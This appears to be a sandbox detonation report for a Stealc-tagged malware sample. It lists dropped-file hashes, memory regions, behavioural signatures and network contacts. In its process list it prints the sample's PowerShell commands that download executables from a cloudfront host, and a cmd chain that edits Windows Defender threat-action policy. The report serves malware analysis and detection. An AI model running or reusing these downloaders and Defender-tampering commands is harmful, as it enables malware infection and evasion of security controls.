memory/1720-225-0x0000000002D40000-0x0000000002D80000-memory.dmp
memory/1720-226-0x0000000073680000-0x0000000073C2B000-memory.dmp
memory/1720-227-0x0000000002D40000-0x0000000002D80000-memory.dmp
memory/1772-228-0x0000000000400000-0x000000000405F000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9fa096e2c49bfa986058dfafa13f0423 |
| SHA1 | 25ffac8bd91cc88a42a2a502d75a0ccc94713c7c |
| SHA256 | 5d22ce5d0cd8d64687dbffea2aca9732d67ccbbf0cc28a1220657c530112d516 |
| SHA512 | 3a4421bedbe6fcaf8a3b58b50dfb65c3578f691e3357173c87cb1430fe2b98d693d8aefb128b7586d97c97e40bc53a751acfb9b394870f12d11f07bc3fbf4b78 |
memory/1772-249-0x0000000004190000-0x0000000004290000-memory.dmp
memory/1048-251-0x00000000005A0000-0x00000000005A1000-memory.dmp
memory/1720-252-0x0000000073680000-0x0000000073C2B000-memory.dmp
memory/1720-260-0x0000000002D40000-0x0000000002D80000-memory.dmp
memory/1720-291-0x0000000073680000-0x0000000073C2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\U1D81~1.ZIP
| MD5 | 78d3ca6355c93c72b494bb6a498bf639 |
| SHA1 | 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e |
| SHA256 | a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001 |
| SHA512 | 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea |
C:\Users\Admin\AppData\Local\Temp\u1d8.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
\Users\Admin\AppData\Local\Temp\u1d8.2\relay.dll
| MD5 | 10d51becd0bbce0fab147ff9658c565e |
| SHA1 | 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a |
| SHA256 | 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed |
| SHA512 | 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29 |
C:\Users\Admin\AppData\Local\Temp\u1d8.2\whale.dbf
| MD5 | a723bf46048e0bfb15b8d77d7a648c3e |
| SHA1 | 8952d3c34e9341e4425571e10f22b782695bb915 |
| SHA256 | b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422 |
| SHA512 | ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273 |
C:\Users\Admin\AppData\Local\Temp\u1d8.2\bunch.dat
| MD5 | 1e8237d3028ab52821d69099e0954f97 |
| SHA1 | 30a6ae353adda0c471c6ed5b7a2458b07185abf2 |
| SHA256 | 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742 |
| SHA512 | a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3 |
memory/1092-406-0x0000000074880000-0x00000000749F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u1d8.2\UIxMarketPlugin.dll
| MD5 | d1ba9412e78bfc98074c5d724a1a87d6 |
| SHA1 | 0572f98d78fb0b366b5a086c2a74cc68b771d368 |
| SHA256 | cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15 |
| SHA512 | 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f |
memory/1092-413-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/1092-407-0x0000000077BF0000-0x0000000077D99000-memory.dmp
memory/1772-414-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1092-415-0x0000000074880000-0x00000000749F4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\49550791
| MD5 | 2fc1b4daec04683ce75e345d537cc55e |
| SHA1 | 7740019d5b50513522325a45ec52e06fcdd4f7bd |
| SHA256 | 9cfa8b7cef08a36acd7191cd650db0f423970fb16d4f5b78b720a7d8775688a1 |
| SHA512 | 65b02de96402455e19f7f6ba28851b2f0ab89c00c1cde76b9f5c4027e45a886c366da40e2fb735b0125edcccc1812ce37477b095b45b57b7648345254f4c4b44 |
memory/1784-418-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/1784-419-0x0000000077BF0000-0x0000000077D99000-memory.dmp
memory/1784-467-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/1784-468-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/1784-472-0x0000000074880000-0x00000000749F4000-memory.dmp
memory/2688-473-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2688-470-0x0000000073170000-0x00000000741D2000-memory.dmp
memory/2688-474-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/2688-476-0x0000000072A80000-0x000000007316E000-memory.dmp
memory/2688-475-0x0000000000400000-0x00000000004C6000-memory.dmp
memory/2688-477-0x0000000004ED0000-0x0000000004F10000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win10v2004-20240226-en
Max time kernel
17s
Max time network
88s
Command Line
Signatures
Stealc
Downloads MZ/PE file
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\i1.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3620 wrote to memory of 3336 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3620 wrote to memory of 3336 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3620 wrote to memory of 3336 | N/A | C:\Users\Admin\AppData\Local\Temp\file.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 3336 wrote to memory of 2636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3336 wrote to memory of 2636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3336 wrote to memory of 2636 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsl222A.tmp\load.bat"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/th.php?c=1000','stat')"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=28381000 /str=one
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe
"C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4224 -ip 4224
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4224 -s 1028
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://dsepc5ud74wta.cloudfront.net/load/dl.php?id=456','i3.exe')"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3928 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\u3sw.2\run.exe
"C:\Users\Admin\AppData\Local\Temp\u3sw.2\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe
"C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4928 -ip 4928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4928 -s 1120
C:\Users\Admin\AppData\Local\Temp\i3.exe
i3.exe
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Users\Admin\AppData\Local\Temp\7zS350B.tmp\Install.exe
.\Install.exe /EdidWTW "385128" /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dsepc5ud74wta.cloudfront.net | udp |
| NL | 108.156.61.113:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 113.61.156.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.15.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.41.65.18.in-addr.arpa | udp |
| NL | 108.156.61.113:443 | dsepc5ud74wta.cloudfront.net | tcp |
| NL | 108.156.61.113:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 59.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| NL | 108.156.61.113:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 240216234727901.mjj.xne26.cfd | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.128.172.185.in-addr.arpa | udp |
| BG | 94.156.35.76:80 | 240216234727901.mjj.xne26.cfd | tcp |
| US | 8.8.8.8:53 | 76.35.156.94.in-addr.arpa | udp |
| RO | 176.97.76.106:80 | tcp | |
| GB | 37.221.125.202:443 | tcp | |
| RU | 45.130.41.108:443 | tcp | |
| DE | 185.172.128.228:80 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\nsl222A.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\nsl222A.tmp\load.bat
| MD5 | c03b3682569c40524152ba0ea7bc25ff |
| SHA1 | 670c137c03ade8b573e4084c12dcb1d00e377c20 |
| SHA256 | 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f |
| SHA512 | 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a |
memory/2636-16-0x00000000733A0000-0x0000000073B50000-memory.dmp
memory/2636-18-0x0000000002F30000-0x0000000002F66000-memory.dmp
memory/2636-17-0x0000000002FA0000-0x0000000002FB0000-memory.dmp
memory/2636-19-0x0000000005620000-0x0000000005C48000-memory.dmp
memory/2636-20-0x0000000005D90000-0x0000000005DB2000-memory.dmp
memory/2636-22-0x0000000005EA0000-0x0000000005F06000-memory.dmp
memory/2636-21-0x0000000005E30000-0x0000000005E96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e2akcz2x.4rf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2636-32-0x0000000005F10000-0x0000000006264000-memory.dmp
memory/2636-33-0x00000000052B0000-0x00000000052CE000-memory.dmp
memory/2636-34-0x00000000065E0000-0x000000000662C000-memory.dmp
memory/2636-35-0x0000000007DC0000-0x000000000843A000-memory.dmp
memory/2636-36-0x0000000006A20000-0x0000000006A3A000-memory.dmp
memory/2636-39-0x00000000733A0000-0x0000000073B50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/1128-41-0x00000000733A0000-0x0000000073B50000-memory.dmp
memory/1128-43-0x00000000049F0000-0x0000000004A00000-memory.dmp
memory/1128-42-0x00000000049F0000-0x0000000004A00000-memory.dmp
memory/1128-53-0x0000000005AE0000-0x0000000005E34000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d02e8dd7e953d11b224009703e99f028 |
| SHA1 | c99416dcb9cf7413ff8295b35ab5c5e18291470f |
| SHA256 | dedf997020412bc936aebd97770ffa81bac44cf868f34e9565527accc96d3c3f |
| SHA512 | f638d24b63919825cc60ab210a59e9ce170fa9b3a3765f2a05147c7b8da18de18e31bdfd7ff1e81b176a3dd33433d63fd3ad5bca2b24dcb4f33541c80801ab32 |
memory/1128-57-0x00000000733A0000-0x0000000073B50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | ae73eb4cbe39e4a9e28a367331329a12 |
| SHA1 | fa827d6b4f9c94dd137fc24b201259a4c8293913 |
| SHA256 | 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e |
| SHA512 | b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500 |
memory/4928-64-0x0000000004390000-0x0000000004490000-memory.dmp
memory/4612-66-0x0000000002AD0000-0x0000000002AE0000-memory.dmp
memory/4928-65-0x00000000042C0000-0x000000000432D000-memory.dmp
memory/4612-63-0x0000000002AD0000-0x0000000002AE0000-memory.dmp
memory/4612-72-0x0000000005A70000-0x0000000005DC4000-memory.dmp
memory/4612-62-0x00000000733A0000-0x0000000073B50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4c6f54730910d3e4dadea44f592baca9 |
| SHA1 | 06abca310c557ed93283b0280aff1357ca12be59 |
| SHA256 | f278d704d280df3b03352a32064577f35c6cae593f0216374739ceeb15030b1a |
| SHA512 | 9e4077f3f1935892b72cb346d1667c737372379b893d1fbdcdb768280d03ac856e33869a2021f85ea6f496e2b43af5eef2a20ebc8dbd02efafad95c2c881a7e4 |
memory/4612-78-0x0000000006180000-0x00000000061CC000-memory.dmp
memory/4612-79-0x0000000002AD0000-0x0000000002AE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe
| MD5 | 80e0fece33768e20034d106db0d36341 |
| SHA1 | ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510 |
| SHA256 | 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e |
| SHA512 | 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f |
memory/4612-86-0x00000000733A0000-0x0000000073B50000-memory.dmp
memory/4224-92-0x00000000040C0000-0x00000000040E7000-memory.dmp
memory/4224-91-0x0000000004150000-0x0000000004250000-memory.dmp
memory/4224-93-0x0000000000400000-0x000000000403C000-memory.dmp
memory/4928-94-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1428-95-0x00000000726A0000-0x0000000072E50000-memory.dmp
memory/1428-105-0x0000000006250000-0x00000000065A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | be1f3feae3671325d6c9b24a5e9c60d0 |
| SHA1 | 025b9f60d608f51ad9a18fc09ed65329f262d10c |
| SHA256 | bb05790c1922675b5060f2fd7c50c9a097eab745213d696f79e7c2c90ebe3cc5 |
| SHA512 | ab86a04e047e382bce0213281f6f3875e58b8d635fc70d92274acdf71b6074c6fe8efd48b6c058bbd023ada0a53f0acdc86baf50d9900ce080f3decccdbc370b |
memory/1428-107-0x00000000068E0000-0x000000000692C000-memory.dmp
memory/4928-108-0x0000000004390000-0x0000000004490000-memory.dmp
memory/1428-112-0x00000000726A0000-0x0000000072E50000-memory.dmp
memory/1428-113-0x00000000055E0000-0x00000000055F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3sw.1.zip
| MD5 | 39c5d2cf57a3b2a153f843ec9c488586 |
| SHA1 | 72d410f9a382781c257c255852a6c520f11acfec |
| SHA256 | 6da1d403f7bef8f14c80a4747ae66e0ad90a74dce18ae5e8913baddb1b6a8de6 |
| SHA512 | 95d54e601da6184f2251375f5eac9f8d5fc810ea48fbf6b6220811cfee4548e38d29cabea4c9b963968a23a6c672a2576f5d229a5c7865107065b82fbf71f3d1 |
C:\Users\Admin\AppData\Local\Temp\u3sw.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
C:\Users\Admin\AppData\Local\Temp\u3sw.2\relay.dll
| MD5 | 10d51becd0bbce0fab147ff9658c565e |
| SHA1 | 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a |
| SHA256 | 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed |
| SHA512 | 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29 |
C:\Users\Admin\AppData\Local\Temp\u3sw.2\whale.dbf
| MD5 | a723bf46048e0bfb15b8d77d7a648c3e |
| SHA1 | 8952d3c34e9341e4425571e10f22b782695bb915 |
| SHA256 | b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422 |
| SHA512 | ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273 |
C:\Users\Admin\AppData\Local\Temp\u3sw.2\bunch.dat
| MD5 | 1e8237d3028ab52821d69099e0954f97 |
| SHA1 | 30a6ae353adda0c471c6ed5b7a2458b07185abf2 |
| SHA256 | 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742 |
| SHA512 | a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3 |
memory/1260-200-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/1260-202-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3sw.2\UIxMarketPlugin.dll
| MD5 | d1ba9412e78bfc98074c5d724a1a87d6 |
| SHA1 | 0572f98d78fb0b366b5a086c2a74cc68b771d368 |
| SHA256 | cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15 |
| SHA512 | 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f |
memory/4928-201-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1260-208-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/1260-209-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5bc8dff9
| MD5 | 912bcdd3a6198009d2b54fc4990f1a28 |
| SHA1 | 85226d65baeda202869e1806c6dd8ada7a617944 |
| SHA256 | 7e6cdd2634516c63ebafbd35d224cb335a374813c14f743ca4eb3856b1213d24 |
| SHA512 | 582878d5c4c3844a15a03936bed8bb871c3b0699fb519262867fb02c03b71baac7d63e4c63374e3178c1ae1f1ce65db4995fc946af72f515e328824cf2602751 |
memory/4100-211-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/4100-214-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
memory/4100-219-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/4100-218-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/4100-221-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/1808-222-0x000000006D030000-0x000000006E284000-memory.dmp
memory/1808-226-0x0000000000FC0000-0x0000000001086000-memory.dmp
memory/1808-227-0x0000000005510000-0x00000000055A2000-memory.dmp
memory/1808-228-0x00000000726A0000-0x0000000072E50000-memory.dmp
memory/1808-229-0x0000000005BD0000-0x0000000006174000-memory.dmp
memory/1808-230-0x0000000005700000-0x0000000005710000-memory.dmp
memory/1808-231-0x00000000058E0000-0x0000000005AA2000-memory.dmp
memory/1808-232-0x0000000005710000-0x0000000005786000-memory.dmp
memory/1808-233-0x0000000005650000-0x00000000056A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe
| MD5 | c81c2c220e6dc8e68be98dd253160972 |
| SHA1 | 35ca97a4a4ba8ab2c7d959a8ec4d3a3eb7a53550 |
| SHA256 | 5c6f78bd2c94c3e2ae60943af869146fe9b78c8a3ebbd2fc98814cde791b8d79 |
| SHA512 | 18a37f715169ebb2905c24ad827a70cee1f21fd449431b3dfa6318fef61319a7a6fee5a2a8fd0920d381f577e7a0f95d4636806711369dcedc3d8a39c7659fda |
C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe
| MD5 | b050af9d04a9e7b827bb94424578d303 |
| SHA1 | 8d42eb0bfe768d5ad14e4029b93148205e1a4338 |
| SHA256 | a971c66b87bd002ad6dd97e59ff2b2b03a6e0332f3f5e66f6a1754a566f79acc |
| SHA512 | e6e0227d380016776c0fb8ed75d11c17c8a271f4bea401a5e82bbaba21d4d7ae306a5f1f22cd116d5704ecb716a872dd179f831d27b21e2e1bb6d22fa497f54d |
C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe
| MD5 | bc0d1292d9bc0f1bb471721695c178c2 |
| SHA1 | 039a7679de9769b4656a202cad86b3e172540914 |
| SHA256 | 2be1c6eee936e18047a5cf2a4103299811a2dfa96ba2ffe06e930c50a53432c3 |
| SHA512 | af97f80ea0dd12c142eb2efe34d8988066121f6bc2630f888c93b50324cc7e1f931628df7931479013302bb56a49351b3f4a53aecb34753c2220f9fabcd44fac |
memory/1880-245-0x00000000026B0000-0x00000000026B1000-memory.dmp
memory/4928-250-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1880-270-0x0000000000400000-0x00000000008AD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | f080db1e41b1e7cd633873f8d40d2806 |
| SHA1 | caa0c2d7078f46f3b50f0b265d1b601b26b2b15f |
| SHA256 | d00965c1b4aa775e3207a4fcc3638ad21281591f1fdd22234d493be61a8c7813 |
| SHA512 | 2495d7a514c169195d101d771380ad9ae45a295517c60794d09e865f1a60268b511c5650515936f5e39f67242c8ca2b07f0554a90e12d2c5b807c55c02bb6978 |
memory/1880-281-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/1428-283-0x00000000726A0000-0x0000000072E50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\i3.exe
| MD5 | 6e5f4e31f072c2aa370f2b8ff602dc2e |
| SHA1 | 29343585a35b3939dcc6fdc6e9bb6cbd56d1dcaf |
| SHA256 | b994abb2f06a392424f4c9125c0753ea3ad3bcd9999dcf8b22315fd947ad5ea3 |
| SHA512 | 5b5d87306e17b9db3eece2cd56a3c84943faf6c0b65e8348f931252686583656153bb6896951878799baa0d324b66ecbfe7caf1ad484f07e489c937df9882ce0 |
C:\Users\Admin\AppData\Local\Temp\i3.exe
| MD5 | 97d96283e1856814e59b8ec8287a445d |
| SHA1 | 889e6f6c65e5b89dde48c883250ab0b9cfffb779 |
| SHA256 | 47de29e2a2222ce812d756b3d5dbbbf22eb55aed4ab8604a8b9e4572922d8b50 |
| SHA512 | 678d21219343f86ca92d75702432d98e63fa0f361a2c284793972ff838e462a89120a07b4cd07cc5725d27dd8a1579a9bb02bfd48bb7fd5e9f8de3831e4bd150 |
memory/1880-299-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/1808-300-0x00000000726A0000-0x0000000072E50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS350B.tmp\Install.exe
| MD5 | 66d7bd46038cf308a2ecd963a9af036a |
| SHA1 | eb02509dc5588b65cd3bb214220e989d26b9f07e |
| SHA256 | 303b0db6efb6e4cf81ce0c6029d85c56620d2ee042c03b3f6be23f8dcdcb4c41 |
| SHA512 | 97ecfce643b5709aca728db26d0dfabac6ca83d6df19b0b3245ca50658f54859c94cd80122b248b76433e9fb2d6d9e98d3d760dd537d61f97afa989d64d6725b |
